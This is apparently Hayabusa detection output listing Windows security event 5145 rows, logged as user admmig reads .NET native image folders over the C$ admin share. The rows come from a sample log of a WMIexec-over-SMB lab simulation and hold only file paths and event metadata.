2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
